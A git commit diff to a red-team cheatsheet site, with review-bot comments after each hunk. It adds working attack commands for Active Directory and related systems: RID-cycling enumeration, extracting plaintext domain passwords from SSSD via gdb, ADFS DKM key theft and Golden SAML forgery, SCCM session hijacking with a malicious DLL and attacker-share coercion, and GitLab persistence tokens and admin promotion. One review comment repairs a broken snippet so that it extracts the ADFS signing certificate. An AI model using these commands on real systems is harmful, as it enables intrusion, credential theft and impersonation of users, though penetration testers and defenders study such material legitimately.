RID Cycling + SSSD keyring + SCCM persistence + Mkdocs config update

pull/11/head
Swissky 2024-04-22 14:51:51 +02:00
parent a7391ccef1
commit 35c34b8313
8 changed files with 276 additions and 42 deletions

View File

@ -303,6 +303,27 @@ You can remotely query every machines on the network to get a list of the users'
```
## RID cycling
Enumerate users from the Domain Controllers.
* Using `netexec`
```ps1
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
```
* Using Impacket script [lookupsid.py](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```ps1
lookupsid.py -no-pass 'guest@rebound.htb' 20000
```
## Other Interesting Commands
- **Find Domain Controllers**
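Review bot: the `lookupsid.py` bullet leaves its trailing `20000` argument unexplained; it is the highest RID the script will try, so the bullet should say so (for example `lookupsid.py -no-pass 'guest@rebound.htb' 20000  # brute-force RIDs up to 20000`). It is also worth stating in the first sentence that both commands only work when the DC accepts a guest or null session over LSARPC, which is exactly what the `[+] rebound.htb\guest:` line in the sample `netexec` output is confirming before the RIDs start to resolve.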

View File

@ -40,7 +40,7 @@ make CONF=Release
## CCACHE ticket reuse from SSSD KCM
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`.
System Security Services Daemon (SSSD) maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`.
The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`.
By default, the key is only readable if you have **root** permissions.
@ -130,7 +130,53 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_
```
## Extract accounts from SSSD keyring
**Requirements**:
* `krb5_store_password_if_offline = True` in `/etc/sssd/sssd.conf`
**Exploit**:
When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext.
```ps1
[domain/domain.local]
cache_credentials = True
ipa_domain = domain.local
id_provider = ipa
auth_provider = ipa
access_provider = ipa
chpass_provider = ipa
ipa_server = _srv_, server.domain.local
krb5_store_password_if_offline = true
```
Grab the PID of the SSSD process and hook it in `gdb`. Then list the process keyrings.
```ps1
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the `/tmp/output` locate the `key_id` for the user you want.
```ps1
Session Keyring
237034099 --alswrv 0 0 keyring: _ses
689325199 --alswrv 0 0 \_ user: user@domain.local
```
Back to GDB:
```ps1
call system("keyctl print 689325199 > /tmp/output")
```
## References
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
* [20.4. Caching Kerberos Passwords - Red Hat Customer Portal](https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/identity_management_guide/kerberos-pwd-cache)
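Review bot: "When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext" overstates the exposure: the steps that follow read it out of the sssd process's session keyring with `keyctl`, so it is held unencrypted in kernel memory for the lifetime of the daemon, not written to disk, and `gdb -p <PID_OF_SSSD>` requires root (ptrace) in the first place. Suggest "the password is cached unencrypted in the kernel keyring of the sssd process" and adding root as a second requirement. Two smaller points: the requirement says `= True` while the sample config says `= true` (pick one), and the `[domain/domain.local]` sample is an `ipa` provider configuration although the sentence talks about an AD password; either an `id_provider = ad` sample or the wording "domain password" would make the two agree.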

View File

@ -1,7 +1,37 @@
# Active Directory - Federation Services
Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.
## ADFS - DKM Master Key
* The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object.
```ps1
$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto
[System.BitConverter]::ToString($key)
```
## ADFS - Trust Relationship
Gets the relying party trusts of the Federation Service.
* Search for `IssuanceAuthorizationRules`
```ps1
Get-AdfsRelyingPartyTrust
```
## ADFS - Golden SAML
Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system.
* Golden SAML are effective even when 2FA is enabled.
* The token-signing private key is not renewed automatically
* Changing a users password won't affect the generated SAML
**Requirements**:
* ADFS service account
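Review bot: two grammar slips in the new Golden SAML bullets: "Golden SAML are effective even when 2FA is enabled" should read "Golden SAML attacks are effective ...", and "Changing a users password" needs the possessive "user's". That third bullet would also be clearer as "Changing a user's password does not invalidate a previously generated SAML token", which states the actual consequence. Since the DKM bullet above shows how to read `thumbnailPhoto` from the ADFS contact object, it would help to say there that this read depends on the same `ADFS service account` (or equivalent rights on `CN=ADFS,CN=Microsoft,CN=Program Data`) that the `**Requirements**` list names.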
@ -9,7 +39,7 @@
**Exploitation**:
* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
* Convert PFX and Private Key to binary format
```ps1
# For the pfx
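Review bot: this hunk normalises "AD FS" to "ADFS" in the ADFSDump bullet, but the page title and the introductory paragraph in the hunk above still use "AD FS"; pick one spelling for the whole page (the section headings already use "ADFS").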
@ -17,6 +47,7 @@
# For the private key
echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin
```
* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof).
```ps1
mkdir ADFSpoofTools
@ -36,11 +67,64 @@
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
```
**Manual Exploitation**:
* Retrieve the WID path: `Get-AdfsProperties`
* Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust`
* Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin`
```powershell
$cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings"
$client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString);
$client.Open();
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT name FROM sys.databases"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$name = $reader.GetString(0)
$reader.Close()
Write-Output $name;
```
* Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory:
```ps1
ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto
```
* Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key`
* Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML
NOTE: There might be multiple master keys in the container, remember to try them all.
**Golden SAML Examples**
* SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions`
```ps1
python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
```
* Office365: requires `--upn` and `--objectguid`
```ps1
python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1
```
* Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format.
**NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server.
Other interesting tools to exploit AD FS:
* [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction.
* [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack
```ps1
python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED
```
## References
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
* [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html)
* [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)
* [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
* [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)
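Review bot: the PowerShell block under "Retrieve the signing certificate" does not retrieve it as written: the first line assigns `$cmd.CommandText` before `$cmd` exists (it is created on line 4), the `ServiceSettingsData` query is then overwritten by `SELECT name FROM sys.databases`, and `$ConnectionString` is never assigned, so at best the snippet prints the first database name. Suggested order: `$ConnectionString = "Data Source=np:\\.\pipe\MICROSOFT##WID\tsql\query;Integrated Security=True"` (the WID pipe the page already names), open the connection, create `$cmd`, then set `$cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings"` and pull the `EncryptedPfx` element out of the returned XML before the `base64 -d adfs.b64 > adfs.bin` step. Minor: this block is fenced as `powershell` while every other block on the page uses `ps1`, the SAML2 example repeats the command from the section above verbatim, and `NOTE:` / `**NOTE**:` are styled differently.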

View File

@ -1,12 +1,11 @@
# Deployment - SCCM
## Application Deployment
## SCCM Application Deployment
> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
@ -75,7 +74,10 @@
```
## Configuration Manager
## SCCM Configuration Manager
* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1)
### CRED-1 Retrieve credentials via PXE boot media
@ -214,6 +216,25 @@ From a remote machine.
```
## SCCM Persistence
* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
* Backdoor the `SCNotification.exe.config` to load your DLL
```ps1
python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
```
* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share
```ps1
python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10
```
## References
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
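Review bot: typo "Adminsitrator" in "This technique requires Adminsitrator privileges on the targeted machine"; "local Administrator" is also more precise, since the service being abused (`CcmExec`) runs on the workstation itself. The second bullet (`coerce -computer 10.10.10.10`) is not a persistence step but a coercion of an outbound connection from `SCNotification.exe`, so either retitle the section or keep only the `exec` example under `## SCCM Persistence`. The `exec` bullet should also say what `exploit.config` is expected to contain, since `SCNotification.exe.config` is the file being replaced and the page gives no sample.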
@ -223,3 +244,8 @@ From a remote machine.
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en)
* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/)
* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/)
* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/)
* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/)

View File

@ -1,7 +1,8 @@
# Application Escape and Breakout
# Kiosk Escape and Jail Breakout
## Summary
* [Methodology](#methodology)
* [Gaining a command shell](#gaining-a-command-shell)
* [Sticky Keys](#sticky-keys)
* [Dialog Boxes](#dialog-boxes)
@ -21,6 +22,19 @@
* [kiosk.vsim.xyz](https://kiosk.vsim.xyz/) - tooling for browser-based, Kiosk mode testing.
## Methodology
- Display global variables and their permissions: `export -p`
- Switch to another user using `sudo`/`su`
- Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at [Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) / [Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)
- List default commands in the restricted shell: `compgen -c`
- Container escape if it's running inside a `Docker`/`LXC` container
- Pivot onto the network
- Scan other machines on the network or attempt SSRF exploitation
- Metadata for Cloud assets, see `cloud/aws` and `cloud/azure`
- Use globbing capability built inside the shell: `echo *`, `echo .*`, `echo /*`
## Gaining a command shell
* **Shortcut**
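Review bot: "Display global variables and their permissions: `export -p`" is inaccurate; `export -p` prints the exported environment variables and their values, no permissions are involved, so "List exported environment variables: `export -p`" is the right wording. "Basic privilege escalations such as CVE, sudo misconfiguration, etc." reads oddly ("such as known CVEs or sudo misconfigurations"). The new list also uses `-` bullets while the rest of this file uses `*` (compare the Summary and `## Gaining a command shell` lines in this same hunk).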
@ -106,6 +120,7 @@ Enter *.* or *.exe or similar in `File name` box
* Print menus
* All other menus that provide dialog boxes
### Accessing filesystem
Enter these paths in the address bar:
@ -115,6 +130,7 @@ Enter these paths in the address bar:
* %HOMEDRIVE%
* \\127.0.0.1\c$\Windows\System32
### Unassociated Protocols
It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`.
@ -143,6 +159,14 @@ firefox irc://127.0.0.1 -P "Test"
## Shell URI Handlers
A URI (Uniform Resource Identifier) handler is a software component that enables a web browser or operating system to pass a URI to an appropriate application for further handling.
For example, when you click on a "mailto:" link in a webpage, your device knows to open your default email application. This is because the "mailto:" URI scheme is registered to be handled by an email application. Similarly, "http:" and "https:" URIs are typically handled by a web browser.
In essence, URI handlers provide a bridge between web content and desktop applications, allowing for a seamless user experience when navigating between different types of resources.
The following URI handlers might trigger application on the machine:
* shell:DocumentsLibrary
* shell:Librariesshell:UserProfiles
* shell:Personal
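Review bot: `* shell:Librariesshell:UserProfiles` is two handlers run together by a lost line break; split it into `* shell:Libraries` and `* shell:UserProfiles`. Also "might trigger application on the machine" should be "might trigger applications on the machine".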

View File

@ -1,14 +1,6 @@
# Source Code Management & CI/CD Compromise
>
## Summary
* [Tools](#tools)
* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets)
* [Personal Access Token](#personal-access-token)
* [Gitlab CI/Github Actions](#gitlab-cigithub-actions)
* [References](#references)
> CI/CD is a method to frequently deliver apps to customers by introducing automation into the stages of app development. The main concepts attributed to CI/CD are continuous integration, continuous delivery, and continuous deployment. Compromises in CI/CD can occur through unauthorized access, misconfiguration, dependency vulnerabilities, insecure secrets, and lack of visibility.
## Tools
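Review bot: this hunk removes the entire `## Summary` block (together with the empty `>` quote line), while the Kiosk page in the same commit keeps its Summary and adds a `Methodology` entry to it. If the removal is because `Gitlab CI/Github Actions` is being split into two headings further down, updating the Summary anchors (`#gitlab-ci`, `#github-actions`, `#ssh-keys`) would keep this page on the same navigation convention as the others instead of dropping it.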
@ -51,17 +43,24 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
```
* Get the assigned privileges to an access token being used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
```
* Promote a normal user to an administrative role in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
```
* Create/List/Delete an access token to be used in a particular SCM system
## Personal Access Token
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
* Manual
```ps1
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
```
* Using `SCMKit.exe`: Create/List/Delete an access token to be used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
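Review bot: the new `* Manual` curl command leaves `--data "expires_at="` unexplained; it is sent empty to request a token with no expiry, and whether the instance honours that depends on its token-expiry policy, so the bullet should say so and suggest setting `expires_at` explicitly where a maximum lifetime is enforced. Its placeholders (`apiToken`, `gitlabHost`, `UserIDNumber`) also follow a different convention from the `userName:password` / `apikey` / `https://gitlab.something.local` placeholders in the SCMKit lines right below; aligning them makes the two variants easier to compare. Minor: `-k` disables certificate validation and belongs only against a lab host.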
@ -69,6 +68,14 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
```
* Get the assigned privileges to an access token being used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
```
## SSH Keys
* Create/List an SSH key to be used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
@ -79,15 +86,8 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
```
## Personal Access Token
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
```ps1
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
```
## Gitlab CI/Github Actions
## Gitlab CI
* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
```yaml
@ -107,6 +107,22 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers
tags:
- ${RUNNER}
```
### Gitlab Executors
* **Shell** executor: The jobs are run with the permissions of the GitLab Runners user and can steal code from other projects that are run on this server.
* **Docker** executor: Docker can be considered safe when running in non-privileged mode.
* **SSH** executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing `StrictHostKeyChecking` option.
### Gitlab CI/CD variables
CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers
## Github Actions
* Github Action "Command Execution" example: `.github/workflows/example.yml`
```yml
name: example
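Review bot: "Docker can be considered safe when running in non-privileged mode" is too absolute for this page; a non-privileged container still shares the host kernel, so "safer than the shell executor" is the defensible wording, with a note that a privileged runner removes that isolation. The shell-executor bullet reads better as "can read the checked-out code and cached credentials of other projects built on the same runner" instead of "steal code from other projects that are run on this server", and the CI/CD variables sentence is missing its final full stop. Also the two job examples use `yaml` and `yml` fence tags respectively; pick one.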
@ -127,7 +143,10 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers
whoami
```
## References
* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/)
* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html)
* [Security for self-managed runners - Gitlab](https://docs.gitlab.com/runner/security/)
* [Fixing Typos and Breaching Microsofts Perimeter - John Stawinski IV - April 15, 2024](https://johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter/)

View File

@ -344,12 +344,18 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
## SSH Protocol
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!)
:warning: You cannot pass the hash to SSH
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
* Connect using username/password of a Domain User
```ps1
ssh -l user@domain 192.168.1.1
```
* Connect with a Kerberos ticket
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
## Other methods
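Review bot: `cp user.ccache /tmp/krb5cc_1045` only works when the local user running `ssh` has uid 1045, because the Kerberos library looks for `/tmp/krb5cc_<uid>` by default; either say that the suffix must match `id -u`, or replace the copy with `export KRB5CCNAME=/path/to/user.ccache`, which works for any uid and does not leave the ticket in `/tmp`. The rewritten warning also dropped the half that made it useful ("but you can connect with a Kerberos ticket, which you can get by passing the hash"); the new "Connect with a Kerberos ticket" bullet is the place to keep that sentence.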

View File

@ -2,8 +2,13 @@ site_name: Internal All The Things
site_description: 'Active Directory and Internal Pentest Cheatsheets'
site_url: https://swisskyrepo.github.io/InternalAllTheThings
repo_url: https://github.com/swisskyrepo/InternalAllTheThings
edit_uri: blob/main/docs/
theme:
name: material
color_mode: auto
user_color_mode_toggle: true
icon:
repo: fontawesome/brands/github
palette:
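Review bot: `edit_uri: blob/main/docs/` points the edit action at GitHub's file viewer; with `content.action.edit` enabled in the `features` list below, the form that opens the web editor is `edit_uri: edit/main/docs/`, and the `blob/` form is what a view link uses. Separately, `color_mode: auto` and `user_color_mode_toggle: true` are options of MkDocs' built-in `mkdocs` theme rather than of `material`, which switches light and dark through the `palette` toggles already configured here; please verify they have any effect under `name: material` instead of being silently ignored or rejected by the theme's config validation.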
@ -23,8 +28,13 @@ theme:
features:
- content.code.copy
- content.action.edit
- content.action.view
- content.tooltips
- navigation.tracking
- navigation.top
- search.share
- search.suggest
extra_css:
- custom.css
@ -46,8 +56,6 @@ markdown_extensions:
emoji_index: !!python/name:material.extensions.emoji.twemoji
emoji_generator: !!python/name:material.extensions.emoji.to_svg
repo_url: https://github.com/swisskyrepo/InternalAllTheThings/
edit_uri: edit/master/
plugins:
- search
- git-revision-date-localized
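Review bot: removing the duplicate `repo_url:` and the `edit_uri: edit/master/` from the bottom of the file is right, since they shadowed the values set at the top, but note that the branch name changes from `master` to `main` between the removed `edit_uri` and the new `blob/main/docs/` one; confirm `main` is the default branch of the repository in `repo_url`, otherwise every edit and view link on the site will 404.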